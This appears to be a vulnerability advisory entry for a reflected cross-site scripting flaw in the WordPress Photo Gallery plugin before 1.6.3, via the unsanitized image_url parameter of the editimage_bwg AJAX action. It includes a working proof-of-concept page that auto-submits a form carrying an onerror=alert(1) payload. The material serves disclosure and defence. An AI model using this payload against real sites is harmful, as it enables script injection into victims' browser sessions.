Photo Gallery < 1.6.3 - Reflected Cross-Site Scripting

2022-04-1100:00:00

JrXnm

0.001 Low

EPSS

Percentile

30.0%

JSON

The plugin does not properly sanitize the $_GET[‘image_url’] variable, which is reflected back to the users when executing the editimage_bwg AJAX action.

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php?image_url=%22onerror=alert(1)%20t=%22" id="hack" method="POST">
      <input type="hidden" name="action" value="editimage&#95;bwg" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>